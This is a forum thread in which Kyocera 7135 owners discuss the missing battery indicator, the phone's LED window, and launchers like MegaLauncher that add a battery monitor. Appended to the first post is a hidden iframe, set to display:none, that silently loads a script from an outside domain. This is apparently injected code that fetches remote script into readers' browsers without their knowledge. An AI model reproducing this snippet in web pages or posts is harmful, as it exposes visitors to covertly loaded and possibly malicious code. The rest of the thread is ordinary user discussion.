+ Reply to Thread

Battery Indicator?

Probably a silly question, but I am lost. I *thought* my last Palm device showed a little battery indicator on the top of the main applications screen (right next to the clock). It's been a while, so maybe I am wrong...

Anyway, the 7135 does not do this, and I have not found a toggle to get it. Is there any way to show this on the 7135?

Thx<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Battery Indicator?

Originally posted by vansman
    Probably a silly question, but I am lost. I *thought* my last Palm device showed a little battery indicator on the top of the main applications screen (right next to the clock). It's been a while, so maybe I am wrong...

Anyway, the 7135 does not do this, and I have not found a toggle to get it. Is there any way to show this on the 7135?

Thx
    You are correct, at least some Palm devices show this with OS 4.1 and it is not on the 7135. If you use LauncherX, it has a battery indicator.

Alan

I use MegaLauncher which has a good battery monitor.

I noticed that in at least one picture of the phone in the user guide they show a battery monitor on the screen. Maybe they intended to include it but never got that far.

Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by tmwebsites
    I use MegaLauncher which has a good battery monitor.

I noticed that in at least one picture of the phone in the user guide they show a battery monitor on the screen. Maybe they intended to include it but never got that far.
    Odd thing is, when I first got the phone, and it "locked", the battery guage did appear during the freeze up. Never saw it on mine again since a hard reset.

Oh well...

Originally posted by tmwebsites
    I don't know about the 7135, but on the 6035, the jog dial toggles display of battery level and signal strength while in Palm mode. The 7135 doesn't have this feature?

There is no multi-function Jog dial on the 7135. The buttons on the side are only for Volume up/down

who needs to know how much battery time is left anyway?

Well this kind of sucks.

Maybe Kyocera was so embarrassed that users could actually watch the battery level lower as they used the phone for a few seconds, that they eradicated the indicator to keep us from noticing...

Re: who needs to know how much battery time is left anyway?

Originally posted by tripm
    Maybe Kyocera was so embarrassed that users could actually watch the battery level lower as they used the phone for a few seconds, that they eradicated the indicator to keep us from noticing...
    I guess that's why my new HUMMER doesn't have a gas gauge...Just kidding:biglaughb

Does anyone know if using a launcher that has a battery monitor (I'm using MegaLauncher) sucks up juice to do its job?
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Originally posted by vansman
    There is no multi-function Jog dial on the 7135. The buttons on the side are only for Volume up/down
    And is there also no battery indicater on the 7135's LED window?

Originally posted by Rambler
    And is there also no battery indicater on the 7135's LED window?
    There is, but it is awkward to use when the screen is open. It is also not very granular.